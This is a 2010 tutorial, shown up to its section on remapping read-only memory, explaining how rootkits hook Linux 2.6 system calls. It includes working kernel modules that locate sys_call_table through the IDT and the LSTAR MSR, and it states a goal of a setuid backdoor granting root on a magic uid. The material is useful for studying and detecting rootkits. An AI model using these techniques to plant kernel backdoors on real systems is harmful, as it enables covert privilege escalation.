Kernel Mode Hooking
- oblique 2010
0x01] Introduction
0x02] Kernel mode hooking basic theory
0x03] LKM - hello kernel
0x04] Interrupt Descriptor Table (IDT)
0x05] Get sys_call_table - Linux x86-32
0x06] Model-Specific Registers (MSRs)
0x07] Get sys_call_table - Linux x86-64
0x08] Get ia32_sys_call_table - Linux x86-64
0x09] Map to a writable memory
0x0A] Hook a system call
0x0B] Other ideas/methods
0x0C] Greets
0x0D] References
--[ 0x01 Introduction
In this article I will show you the basic technique that rootkits use
to hook system calls in kernel mode. I will deal only with Linux 2.6 on
x86-32 and x86-64. At the end we are going to hook the setuid system
call so that, when it receives a "magic" uid as its argument, it gives
root to the calling process.
--[ 0x02 Kernel mode hooking basic theory
Modern operating systems on the x86 architecture use the well-known
protected mode. In protected mode there are 4 different privilege
levels, 0 to 3 (a.k.a. ring0 - ring3). The highest-numbered level (the
least privileged) is userland (ring3) and the lowest-numbered level
(the most privileged) is kernel mode (ring0). Applications run in
userland and they enter the kernel to tell it which system call it has
to execute. In Linux x86-32 this is done with the software interrupt
"int $0x80" and in Linux x86-64 with the instruction "syscall". When
the CPU executes either of them, it switches from ring3 to ring0 and
jumps to system_call. Let's see the source code for x86-32:
"arch/x86/kernel/entry_32.S" from [5]
...
...
ENTRY(system_call)
RING0_INT_FRAME
pushl %eax
CFI_ADJUST_CFA_OFFSET 4
SAVE_ALL
GET_THREAD_INFO(%ebp)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%ebp)
jnz syscall_trace_entry
cmpl $(nr_syscalls), %eax
jae syscall_badsys
syscall_call:
call *sys_call_table(,%eax,4)
movl %eax,PT_EAX(%esp)
syscall_exit:
LOCKDEP_SYS_EXIT
DISABLE_INTERRUPTS(CLBR_ANY)
TRACE_IRQS_OFF
movl TI_flags(%ebp), %ecx
testl $_TIF_ALLWORK_MASK, %ecx
jne syscall_exit_work
...
...
As you can see, the instruction "call *sys_call_table(,%eax,4)" calls
the system call through an array of pointers (sys_call_table), indexed
by the value of EAX. These values can be found in
/usr/include/asm/unistd_32.h (for x86-32) and
/usr/include/asm/unistd_64.h (for x86-64).
The same thing happens on x86-64, but there is one more array there,
the ia32_sys_call_table, which is used by ia32_syscall. It serves the
emulation of 32-bit binaries.
To hook a system call we have to replace its pointer in sys_call_table
with a pointer to a function that we have created, which will call the
real function (if needed). This cannot be done by a normal userland
program because it doesn't have access to kernel memory (actually it
can, via /dev/kmem or /dev/mem, when these are accessible), so we will
use a Loadable Kernel Module (LKM) to write kernel mode code. Many
people know LKMs as hardware drivers which can be loaded from the shell
with the commands modprobe or insmod. In fact an LKM is a module that
is loaded into kernel memory and after that becomes part of the kernel.
In kernel 2.4 hooking is very easy because sys_call_table is exported,
so with "extern void *sys_call_table[];" you can get it and write to
it. Unlike 2.4, in kernel 2.6 sys_call_table is not exported and after
2.6.16-rc1 it is also read-only. There are solutions for both
problems, and there are 2 different ways to get the address of
sys_call_table, which we are going to examine later.
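Before touching the kernel, the pointer swap described above can be
tried in userland. What follows is only a toy sketch under my own
assumptions: toy_call_table, toy_dispatch(), toy_hook() and the
handlers are made-up names that model the idea, they are not kernel
symbols.

```c
/* Toy model of a system call table: an array of function pointers
 * indexed by a call number. All names here are hypothetical. */
typedef long (*toy_call_t)(long arg);

static long toy_double(long arg) { return arg * 2; }
static long toy_negate(long arg) { return -arg; }

static toy_call_t toy_call_table[] = { toy_double, toy_negate };
#define TOY_NR_CALLS (sizeof(toy_call_table) / sizeof(toy_call_table[0]))

/* Plays the role of "call *sys_call_table(,%eax,4)". */
long toy_dispatch(unsigned long nr, long arg) {
    if (nr >= TOY_NR_CALLS)
        return -1;                  /* like the jump to syscall_badsys */
    return toy_call_table[nr](arg);
}

/* Saved original pointer, so that the hook can forward to it and so
 * that the table can be restored later. */
static toy_call_t real_double;

static long hooked_double(long arg) {
    if (arg == 31337)               /* "magic" argument */
        return 0;
    return real_double(arg);        /* everything else is forwarded */
}

/* Install the hook: remember the real pointer, then overwrite it. */
void toy_hook(void) {
    real_double = toy_call_table[0];
    toy_call_table[0] = hooked_double;
}

/* Remove the hook; must only be called after toy_hook(). */
void toy_unhook(void) {
    toy_call_table[0] = real_double;
}
```

Callers of toy_dispatch() never notice the swap, except for the magic
argument. The real thing differs in where the table lives and in how we
get write access to it, which is what the rest of the article is about.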
--[ 0x03 LKM - hello kernel
Before I continue I will show how we can write and compile an LKM (if
you know how to do this just skip this section). An LKM does not have
main() but has 2 other functions: init_module(), which is called when
we load the module, and cleanup_module(), which is called when we (or
the kernel) unload the module. init_module() returns an int; if it is
a negative number the module is not loaded and an error is returned,
and if it is 0 the module has been loaded successfully. Functions
which do not take arguments must have void in the parentheses, because
in C an empty "()" does not declare a prototype and the kernel is built
with -Wstrict-prototypes. Another convention is that we declare the
license of the module with the macro MODULE_LICENSE() (more info:
http://kerneltrap.org/node/2991 ).
--file: hello_kernel.c--
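#include <linux/module.h>

/* Called when the module is loaded; returning 0 means success. */
int init_module(void) {
    printk(KERN_INFO "Hello kernel!\n");
    return 0;
}

/* Called when the module is unloaded. */
void cleanup_module(void) {
    printk(KERN_INFO "Bye bye kernel!\n");
}

MODULE_LICENSE("GPL");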
--EOF--
In kernel 2.6 there is one more way to declare the init and cleanup
functions and we can use any name we want.
init function declaration:
static int __init name_1(void) {
}
cleanup function declaration:
static void __exit name_2(void) {
}
and then we do this:
module_init(name_1);
module_exit(name_2);
A second example of hello_kernel.c:
--file: hello_kernel.c--
#include <linux/module.h>

static int __init hello_init(void) {
    printk(KERN_INFO "Hello kernel!\n");
    return 0;
}

static void __exit hello_exit(void) {
    printk(KERN_INFO "Bye bye kernel!\n");
}

module_init(hello_init);
module_exit(hello_exit);
MODULE_LICENSE("GPL");
--EOF--
The kernel uses printk() to print messages. printk() has the same
syntax as printf(), but the format string should start with the log
level of the message. The available levels are: KERN_EMERG, KERN_ALERT,
KERN_CRIT, KERN_ERR, KERN_WARNING, KERN_NOTICE, KERN_INFO, KERN_DEBUG,
plus the special markers KERN_DEFAULT and KERN_CONT. To see these
messages we run the command 'dmesg' (more info: 'man dmesg').
To compile a module in kernel 2.6 we have to create a Makefile which
sets the variable obj-m. In obj-m we list the module names, but with
the .o extension. In our case it is hello_kernel.o
--file: Makefile--
obj-m = hello_kernel.o
KDIR = /lib/modules/$(shell uname -r)/build

all:
	make -C $(KDIR) M=$(PWD) modules

clean:
	make -C $(KDIR) M=$(PWD) clean
--EOF--
(more info: "Documentation/kbuild/modules.txt" from [5])
-- NOTE --
Don't forget that the basic syntax of Makefile is:
<target>: [ <dependency > ]*
[ <TAB> <command> <endl> ]+
So the two lines that start with "make" must begin with a Tab, not
with spaces. If you run 'make' and you get an error such as "missing
separator", check for this.
-- END OF NOTE --
After the creation of Makefile we have to run 'make' to compile the
module. Then we run as root 'insmod hello_kernel.ko' to load it and
'rmmod hello_kernel' to unload it.
oblique@gentoo ~/hello_kernel $ ls
hello_kernel.c Makefile
oblique@gentoo ~/hello_kernel $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hello_kernel modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
CC [M] /home/oblique/hello_kernel/hello_kernel.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/oblique/hello_kernel/hello_kernel.mod.o
LD [M] /home/oblique/hello_kernel/hello_kernel.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hello_kernel $ sudo insmod hello_kernel.ko
oblique@gentoo ~/hello_kernel $ dmesg
...
...
[60947.072113] Hello kernel!
oblique@gentoo ~/hello_kernel $ sudo rmmod hello_kernel
oblique@gentoo ~/hello_kernel $ dmesg
...
...
[60947.072113] Hello kernel!
[61105.613280] Bye bye kernel!
oblique@gentoo ~/hello_kernel $
--[ 0x04 Interrupt Descriptor Table (IDT)
The IDT is a table of the x86 architecture which can have up to 256
entries, each being one of 3 gate types (task gate, interrupt gate,
trap gate). The entry for "int $0x80" is one of these gates. The table
itself is stored in kernel memory and the kernel just loads its address
into the IDT Register (IDTR) with the instruction LIDT. We can read
this register with the instruction SIDT, which takes a memory address
as its destination operand. The structure of IDTR is:
x86-32:
BYTES NAMES
2 limit
4 base
x86-64:
BYTES NAMES
2 limit
8 base
base is the address where the IDT starts, and by adding limit to it we
get the table's last memory address. We can express IDTR with this C
struct:
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
-- NOTE --
The "__attribute__ ((packed))" tells gcc not to insert padding between
the members of the struct. In other words it creates a struct that has
exactly the byte layout we want.
-- END OF NOTE --
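The effect of the attribute is easy to check in userland. The sketch
below is only an illustration; the struct names idtr_unpacked and
idtr_packed and the helper functions are mine, and the exact size of
the unpacked variant depends on the ABI.

```c
#include <stddef.h>

/* Same members as struct idtr, once without and once with the packed
 * attribute (a GCC/Clang extension). Names are hypothetical. */
struct idtr_unpacked {
    unsigned short limit;
    void *base;
};

struct idtr_packed {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));

/* Total size of each variant. */
size_t unpacked_size(void) { return sizeof(struct idtr_unpacked); }
size_t packed_size(void)   { return sizeof(struct idtr_packed); }

/* Byte offset of 'base' inside each variant. */
size_t unpacked_base_off(void) { return offsetof(struct idtr_unpacked, base); }
size_t packed_base_off(void)   { return offsetof(struct idtr_packed, base); }
```

In the packed variant base starts right after the 2 bytes of limit,
which is the layout that SIDT writes. Without the attribute the
compiler is free to align base, so the struct would not match what the
CPU stores.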
Now we know that the IDT starts at base and that its entries are gates
of 3 types. A descriptor of the IDT has this structure:
x86-32:
BYTES NAMES
2 offset low bits (0..15)
2 segment selector
1 zero
1 type & flags
2 offset high bits (16..31)
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero;
unsigned char type_flags;
unsigned short offset_high;
} __attribute__ ((packed));
type_flags holds the type of the gate together with some flags. From
this struct we will only need offset_low and offset_high. To get the
offset we write the following:
offset = (offset_high<<16) | offset_low
x86-64:
BYTES NAMES
2 offset low bits (0..15)
2 segment selector
1 zero
1 type & flags
2 offset middle bits (16..31)
4 offset high bits (32..63)
4 zero
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero1;
unsigned char type_flags;
unsigned short offset_middle;
unsigned int offset_high;
unsigned int zero2;
} __attribute__ ((packed));
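Only offset_low, offset_middle and offset_high are needed here. The
code below gets the offset (the parts have to be widened to 64 bits
before they are shifted):
offset = ((unsigned long)offset_high<<32) |
((unsigned long)offset_middle<<16) | offset_low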
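The reassembly of the 64-bit offset can be checked in userland. This is
a sketch with fixed-width types; struct idt_descriptor64 and
gate_offset64() are names I made up for the example, and the test
values are the ia32_syscall address that appears later in the article.

```c
#include <stdint.h>

/* 16-byte x86-64 gate descriptor: same fields as in the article, but
 * with fixed-width types. The name is hypothetical. */
struct idt_descriptor64 {
    uint16_t offset_low;
    uint16_t selector;
    uint8_t  zero1;
    uint8_t  type_flags;
    uint16_t offset_middle;
    uint32_t offset_high;
    uint32_t zero2;
} __attribute__ ((packed));

/* Widen every part to 64 bits before shifting. Without the casts,
 * offset_middle would be promoted to a signed int and a value with
 * bit 15 set could be sign-extended into the high half. */
uint64_t gate_offset64(const struct idt_descriptor64 *d) {
    return ((uint64_t)d->offset_high   << 32) |
           ((uint64_t)d->offset_middle << 16) |
            (uint64_t)d->offset_low;
}
```

For kernel addresses the high 32 bits are 0xffffffff anyway, so the
unwidened expression gives the right answer by luck; the casts make it
right for every value.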
--[ 0x05 Get sys_call_table - Linux x86-32
There are 2 ways to obtain the sys_call_table: 1) from some files
(/boot/System.map-(kernel_version), vmlinux, /proc/kallsyms), but these
files may not even exist. 2) from the IDT descriptor of interrupt
0x80.
Method 1:
oblique@gentoo ~ $ grep sys_call_table /boot/System.map-`uname -r`
c1582160 R sys_call_table
oblique@gentoo ~ $ nm /usr/src/linux/vmlinux | grep sys_call_table
c1582160 R sys_call_table
oblique@gentoo ~ $ grep sys_call_table /proc/kallsyms
oblique@gentoo ~ $ grep system_call /proc/kallsyms
c157fac4 T system_call
-- NOTE --
/usr/src/linux is the path of your kernel source. Also the addresses we
got differ from system to system.
-- END OF NOTE --
As we can see, the first 2 commands gave us the address of
sys_call_table. /proc/kallsyms doesn't contain it here, but it has
system_call. Let's check system_call with gdb.
oblique@gentoo ~ $ gdb -q /usr/src/linux/vmlinux
Reading symbols from /usr/src/linux-2.6.34-zen1-r2/vmlinux...done.
(gdb) x/30i 0xc157fac4
0xc157fac4: push %eax
0xc157fac5: cld
0xc157fac6: push $0x0
0xc157fac8: push %fs
0xc157faca: push %es
0xc157facb: push %ds
0xc157facc: push %eax
0xc157facd: push %ebp
0xc157face: push %edi
0xc157facf: push %esi
0xc157fad0: push %edx
0xc157fad1: push %ecx
0xc157fad2: push %ebx
0xc157fad3: mov $0x7b,%edx
0xc157fad8: mov %edx,%ds
0xc157fada: mov %edx,%es
0xc157fadc: mov $0xd8,%edx
0xc157fae1: mov %edx,%fs
0xc157fae3: mov $0xffffe000,%ebp
0xc157fae8: and %esp,%ebp
0xc157faea: testl $0x100001d1,0x8(%ebp)
0xc157faf1: jne 0xc157fbd8
0xc157faf7: cmp $0x152,%eax
0xc157fafc: jae 0xc157fc21
0xc157fb02: call *-0x3ea7dea0(,%eax,4)
0xc157fb09: mov %eax,0x18(%esp)
0xc157fb0d: cli
0xc157fb0e: mov 0x8(%ebp),%ecx
0xc157fb11: test $0x1000feff,%ecx
0xc157fb17: jne 0xc157fbf8
Here we can see the first 30 instructions of system_call (0xc157fac4).
As I have shown before, there is a call that executes the system call
from sys_call_table. This call is at address 0xc157fb02 and the next
instruction is at 0xc157fb09. So 0xc157fb09 - 0xc157fb02 = 7 bytes.
(gdb) x/7xb 0xc157fb02
0xc157fb02: 0xff 0x14 0x85 0x60 0x21 0x58 0xc1
The first 3 bytes are the opcode, ModRM and SIB bytes of the
instruction and the 4-byte address of sys_call_table follows.
(gdb) x/xw 0xc157fb02 + 3
0xc157fb05: 0xc1582160
So now we found the address of sys_call_table. I will not implement
this method because I prefer the second.
Method 2:
As you should already know, the interrupt handlers are reachable
through the IDT. When we execute the instruction "int $0x80" the CPU
goes to the IDT, takes the descriptor of interrupt 0x80 and jumps to
the offset stored in it, which is the address of system_call. So,
starting from that offset, we can search for the pattern 0xff 0x14 0x85
and when we find it the next 4 bytes are the address of
sys_call_table.
--file: get_sct.c--
#include <linux/module.h>
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero;
unsigned char type_flags;
unsigned short offset_high;
} __attribute__ ((packed));
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
void *get_sys_call_table(void) {
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *system_call;
    unsigned char *ptr;
    int i;

    /* read IDTR and copy the descriptor of interrupt 0x80 */
    asm volatile("sidt %0" : "=m"(idtr));
    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

    /* cast before shifting, so that the shift is not done on an int */
    system_call = (void*)(((unsigned long)idtd.offset_high<<16) |
                          idtd.offset_low);
    printk(KERN_INFO "system_call: 0x%p\n", system_call);

    /* look for "call *sys_call_table(,%eax,4)" */
    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
        ptr++;
    }

    return NULL;
}
static int __init sct_init(void) {
printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
return 0;
}
static void __exit sct_exit(void) {
}
module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
Explanation:
asm volatile("sidt %0" : "=m"(idtr));
memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
Here we read IDTR and then, with 'base + 0x80*sizeof(idtd)', we copy
the IDT descriptor of interrupt 0x80.
system_call = (void*)(((unsigned long)idtd.offset_high<<16) |
idtd.offset_low);
for (ptr=system_call, i=0; i<500; i++) {
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
return *((void**)(ptr+3));
ptr++;
}
Here we calculate the address of system_call and then loop over its
first 500 bytes looking for the pattern. When we find it we add 3 and
return the value stored at that address.
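The search itself does not need the kernel, so it can be tested in
userland on the bytes we saw in gdb. This is a bounded variant that I
wrote for illustration; find_call_table32() is a hypothetical name and,
unlike the loop in the module, it never reads past the buffer it was
given.

```c
#include <stddef.h>
#include <stdint.h>

/* Scan 'len' bytes of code for "ff 14 85 <disp32>" and return the
 * 32-bit address that follows the pattern, or 0 if it is not found. */
uint32_t find_call_table32(const unsigned char *code, size_t len) {
    size_t i;

    /* 3 pattern bytes + 4 address bytes must fit in the buffer */
    for (i = 0; i + 7 <= len; i++) {
        if (code[i] == 0xff && code[i + 1] == 0x14 && code[i + 2] == 0x85) {
            /* the address is stored little-endian after the pattern */
            return (uint32_t)code[i + 3] |
                   ((uint32_t)code[i + 4] << 8) |
                   ((uint32_t)code[i + 5] << 16) |
                   ((uint32_t)code[i + 6] << 24);
        }
    }
    return 0;
}
```

Fed with the 7 bytes from 0xc157fb02, it returns the same 0xc1582160
that System.map reported. Keep in mind that a 3-byte pattern could in
principle match unrelated bytes, so the result is a good guess and not
a proof.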
oblique@gentoo ~/hooking $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
CC [M] /home/oblique/hooking/get_sct.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/oblique/hooking/get_sct.mod.o
LD [M] /home/oblique/hooking/get_sct.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hooking $ sudo insmod get_sct.ko
oblique@gentoo ~/hooking $ dmesg | tail
...
...
[70274.087185] system_call: 0xc157fac4
[70274.087190] sys_call_table: 0xc1582160
oblique@gentoo ~/hooking $ sudo rmmod get_sct
--[ 0x06 Model-Specific Registers (MSRs)
MSRs are registers that are used for very specific CPU jobs. To write
to an MSR we use the instruction WRMSR and to read one we use the
instruction RDMSR. These 2 instructions use 3 registers: EDX, EAX and
ECX. ECX must hold the address (number) of the MSR we want to access.
MSRs are 64-bit registers; EDX carries the high 32 bits and EAX the low
32 bits. The MSR addresses that we put in ECX can be found in [8].
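RDMSR and WRMSR are privileged, but the EDX:EAX arithmetic can be shown
in userland. A minimal sketch, assuming nothing more than the register
layout described above; msr_combine() and msr_split() are names I made
up.

```c
#include <stdint.h>

/* Combine the two halves that RDMSR leaves in EDX:EAX into one 64-bit
 * value. Both halves are unsigned, so the low half cannot be
 * sign-extended into the high half. */
uint64_t msr_combine(uint32_t eax_low, uint32_t edx_high) {
    return ((uint64_t)edx_high << 32) | eax_low;
}

/* Split a 64-bit value into the halves that WRMSR expects. */
void msr_split(uint64_t value, uint32_t *eax_low, uint32_t *edx_high) {
    *eax_low  = (uint32_t)value;
    *edx_high = (uint32_t)(value >> 32);
}
```

If the halves were kept in signed ints, a low half with bit 31 set
would be sign-extended when it is ORed into the 64-bit result. That is
harmless only as long as the high half is 0xffffffff.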
--[ 0x07 Get sys_call_table - Linux x86-64
The instruction SYSCALL is used to call x86-64 system calls and it
takes its target from the IA32_LSTAR MSR. According to [8] the address
of IA32_LSTAR is 0xc0000082. The IA32_LSTAR MSR in fact holds the
address of system_call.
"arch/x86/kernel/entry_64.S" from [5]
...
...
ENTRY(system_call)
CFI_STARTPROC simple
CFI_SIGNAL_FRAME
CFI_DEF_CFA rsp,KERNEL_STACK_OFFSET
CFI_REGISTER rip,rcx
SWAPGS_UNSAFE_STACK
ENTRY(system_call_after_swapgs)
movq %rsp,PER_CPU_VAR(old_rsp)
movq PER_CPU_VAR(kernel_stack),%rsp
ENABLE_INTERRUPTS(CLBR_NONE)
SAVE_ARGS 8,1
movq %rax,ORIG_RAX-ARGOFFSET(%rsp)
movq %rcx,RIP-ARGOFFSET(%rsp)
CFI_REL_OFFSET rip,RIP-ARGOFFSET
GET_THREAD_INFO(%rcx)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%rcx)
jnz tracesys
system_call_fastpath:
cmpq $__NR_syscall_max,%rax
ja badsys
movq %r10,%rcx
call *sys_call_table(,%rax,8)
movq %rax,RAX-ARGOFFSET(%rsp)
ret_from_sys_call:
...
...
The "call *sys_call_table(,%rax,8)" calls the system call. Let's see
system_call in gdb.
oblique@sandbox64:~$ grep sys_call_table /boot/System.map-`uname -r`
ffffffff81544380 R sys_call_table
ffffffff8154dff8 r ia32_sys_call_table
oblique@sandbox64:~$ grep system_call /boot/System.map-`uname -r`
ffffffff81012060 T system_call
ffffffff81012070 T system_call_after_swapgs
ffffffff810120dc t system_call_fastpath
oblique@sandbox64:~$ gdb -q /usr/src/linux/vmlinux
Reading symbols from /usr/src/linux-2.6.32/vmlinux...done.
(gdb) x/30i 0xffffffff81012060
0xffffffff81012060: swapgs
0xffffffff81012063: data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
0xffffffff81012070: mov %rsp,%gs:0xc6c8
0xffffffff81012079: mov %gs:0xcbc8,%rsp
0xffffffff81012082: push %rax
0xffffffff81012083: callq *0x790a0f(%rip) # 0xffffffff817a2a98
0xffffffff81012089: pop %rax
0xffffffff8101208a: sub $0x50,%rsp
0xffffffff8101208e: mov %rdi,0x40(%rsp)
0xffffffff81012093: mov %rsi,0x38(%rsp)
0xffffffff81012098: mov %rdx,0x30(%rsp)
0xffffffff8101209d: mov %rax,0x20(%rsp)
0xffffffff810120a2: mov %r8,0x18(%rsp)
0xffffffff810120a7: mov %r9,0x10(%rsp)
0xffffffff810120ac: mov %r10,0x8(%rsp)
0xffffffff810120b1: mov %r11,(%rsp)
0xffffffff810120b5: mov %rax,0x48(%rsp)
0xffffffff810120ba: mov %rcx,0x50(%rsp)
0xffffffff810120bf: mov %gs:0xcbc8,%rcx
0xffffffff810120c8: sub $0x1fd8,%rcx
0xffffffff810120cf: testl $0x100001d1,0x10(%rcx)
0xffffffff810120d6: jne 0xffffffff8101222c
0xffffffff810120dc: cmp $0x12a,%rax
0xffffffff810120e2: ja 0xffffffff810121b6
0xffffffff810120e8: mov %r10,%rcx
0xffffffff810120eb: callq *-0x7eabbc80(,%rax,8)
0xffffffff810120f2: mov %rax,0x20(%rsp)
0xffffffff810120f7: mov $0x1000feff,%edi
0xffffffff810120fc: mov %gs:0xcbc8,%rcx
0xffffffff81012105: sub $0x1fd8,%rcx
The instruction that we are looking for is at 0xffffffff810120eb and it
is 7 bytes long.
(gdb) x/7xb 0xffffffff810120eb
0xffffffff810120eb: 0xff 0x14 0xc5 0x80 0x43 0x54 0x81
(gdb) x/xw 0xffffffff810120eb + 3
0xffffffff810120ee: 0x81544380
As you can see we have the sys_call_table address, but only its low 32
bits: the CPU sign-extends this 32-bit displacement to 64 bits, so the
high bits are 0xffffffff. The pattern that we are looking for is not
the same as on x86-32; now it is 0xff 0x14 0xc5.
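The sign extension can be written out explicitly. The sketch below
decodes the 7 bytes we dumped with gdb; sign_extend_disp32() and
decode_call_table64() are hypothetical helper names, not kernel
functions.

```c
#include <stdint.h>

/* Sign-extend a 32-bit displacement to 64 bits, the way the CPU treats
 * the displacement of "call *disp32(,%rax,8)" in 64-bit mode. */
uint64_t sign_extend_disp32(uint32_t disp) {
    if (disp & 0x80000000u)
        return 0xffffffff00000000ULL | disp;
    return disp;
}

/* Decode the table address from the 7 bytes of the call instruction
 * (ff 14 c5 followed by a little-endian disp32). Returns 0 if the
 * bytes do not start with the expected pattern. */
uint64_t decode_call_table64(const unsigned char insn[7]) {
    uint32_t disp;

    if (insn[0] != 0xff || insn[1] != 0x14 || insn[2] != 0xc5)
        return 0;
    disp = (uint32_t)insn[3] | ((uint32_t)insn[4] << 8) |
           ((uint32_t)insn[5] << 16) | ((uint32_t)insn[6] << 24);
    return sign_extend_disp32(disp);
}
```

ORing 0xffffffff00000000 unconditionally, as the module does, gives the
same result for kernel addresses because their bit 31 is always set in
this address range.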
--file: get_sct64.c--
#include <linux/module.h>
#define IA32_LSTAR 0xc0000082
void *get_sys_call_table(void) {
    void *system_call;
    unsigned char *ptr;
    unsigned int low, high;
    int i;

    /* RDMSR returns the MSR selected by ECX in EDX:EAX */
    asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));

    /* unsigned halves, so that low is not sign-extended */
    system_call = (void*)(((unsigned long)high<<32) | low);
    printk(KERN_INFO "system_call: 0x%p\n", system_call);

    /* look for "call *sys_call_table(,%rax,8)" */
    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}
static int __init sct_init(void) {
printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
return 0;
}
static void __exit sct_exit(void) {
}
module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
oblique@sandbox64:~/hooking$ sudo insmod get_sct641.ko
oblique@sandbox64:~/hooking$ dmesg | tail
...
...
[ 3027.560110] system_call: 0xffffffff81012060
[ 3027.560110] sys_call_table: 0xffffffff81544380
oblique@sandbox64:~/hooking$ sudo rmmod get_sct641
--[ 0x08 Get ia32_sys_call_table - Linux x86-64
As we know, x86-32 binaries use interrupt 0x80 to call system calls.
So that the kernel can run x86-32 binaries, the kernel developers
created ia32_syscall, which calls the system call through
ia32_sys_call_table. As we saw above the interrupts are defined in the
IDT, so we already know the technique to get ia32_sys_call_table.
ia32_syscall uses "call *ia32_sys_call_table(,%rax,8)" to call a
system call, and the pattern that we are looking for is 0xff 0x14 0xc5.
--file: get_ia32_sct64.c--
#include <linux/module.h>
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero1;
unsigned char type_flags;
unsigned short offset_middle;
unsigned int offset_high;
unsigned int zero2;
} __attribute__ ((packed));
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
void *get_ia32_sys_call_table(void) {
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *ia32_syscall;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));
    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

    /* widen each part before shifting, to avoid sign extension */
    ia32_syscall = (void*)(((unsigned long)idtd.offset_high<<32) |
                           ((unsigned long)idtd.offset_middle<<16) |
                           idtd.offset_low);
    printk(KERN_INFO "ia32_syscall: 0x%p\n", ia32_syscall);

    /* look for "call *ia32_sys_call_table(,%rax,8)" */
    for (ptr=ia32_syscall, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }

    return NULL;
}
static int __init sct_init(void) {
printk(KERN_INFO "ia32_sys_call_table: 0x%p", get_ia32_sys_call_table());
return 0;
}
static void __exit sct_exit(void) {
}
module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
oblique@sandbox64:~/hooking$ grep ia32_syscall /boot/System.map-`uname -r`
ffffffff810464e0 T ia32_syscall
ffffffff8154ea80 r ia32_syscall_end
oblique@sandbox64:~/hooking$ grep ia32_sys_call_table /boot/System.map-`uname -r`
ffffffff8154dff8 r ia32_sys_call_table
oblique@sandbox64:~/hooking$ sudo insmod get_ia32_sct64.ko
oblique@sandbox64:~/hooking$ dmesg | tail
...
...
[ 5786.380128] ia32_syscall: 0xffffffff810464e0
[ 5786.380128] ia32_sys_call_table: 0xffffffff8154dff8
oblique@sandbox64:~/hooking$ sudo rmmod get_ia32_sct64
--[ 0x09 Map to a writable memory
As I said in section 0x02, sys_call_table is read-only. The same holds
for other parts of kernel memory. The solution is to create a second,
writable mapping of the same pages with vmap().
void *vmap(struct page **pages, unsigned int count,
unsigned long flags, pgprot_t prot);
As we can see, vmap takes 4 arguments. The 1st argument is an array of
pointers to 'struct page', the 2nd is the number of pages, the 3rd
holds flags and the 4th describes the memory protection.
Virtual memory is divided into pages of 4096 bytes each (we can get
the size with PAGE_SIZE). An address at the beginning of a page has its
low 12 bits (bits 0..11) set to zero. For any other address we get the
address of its page by performing a bitwise AND with PAGE_MASK. To get
the 'struct page' of a virtual address we use the virt_to_page() macro.
Two virtual addresses belong to the same page only if they differ in
nothing but bits 0..11.
According to [6] virt_to_page() was broken on the x86-64 architecture
and it was fixed in version 2.6.22. In that case we will need to use
"pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);" (addr is the variable
with our address). Now we will need some preprocessor checks: if
__i386__ is defined the compilation targets an x86-32 system, and if
__x86_64__ is defined it targets an x86-64 system. LINUX_VERSION_CODE
contains the numeric value of the kernel version, and with the
KERNEL_VERSION() macro we can get the value of any version we want, so
we will need to include linux/version.h.
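To see why such version comparisons work, here is a userland copy of
the encoding that linux/version.h uses in the 2.6 series: each of the 3
numbers gets its own byte. TOY_KERNEL_VERSION and
toy_needs_pfn_fallback() are my own names for this sketch; in a module
you would use the real KERNEL_VERSION() and LINUX_VERSION_CODE.

```c
/* Userland copy of the version encoding from linux/version.h in the
 * 2.6 series. The TOY_ prefix marks it as an illustration only. */
#define TOY_KERNEL_VERSION(a, b, c) (((a) << 16) + ((b) << 8) + (c))

/* Mirrors the check
 *   LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
 * with both facts passed in as ordinary arguments. */
int toy_needs_pfn_fallback(unsigned int version_code, int is_x86_64) {
    return is_x86_64 &&
           version_code < (unsigned int)TOY_KERNEL_VERSION(2, 6, 22);
}
```

Because the major number sits in the highest byte, a plain integer
comparison orders versions correctly as long as each part fits in 8
bits.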
